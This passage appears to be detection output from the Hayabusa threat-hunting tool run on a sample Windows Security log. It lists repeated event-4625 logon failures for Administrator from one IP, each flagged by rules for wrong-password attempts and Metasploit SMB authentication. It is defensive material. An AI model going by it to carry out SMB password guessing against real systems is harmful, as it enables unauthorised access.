NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
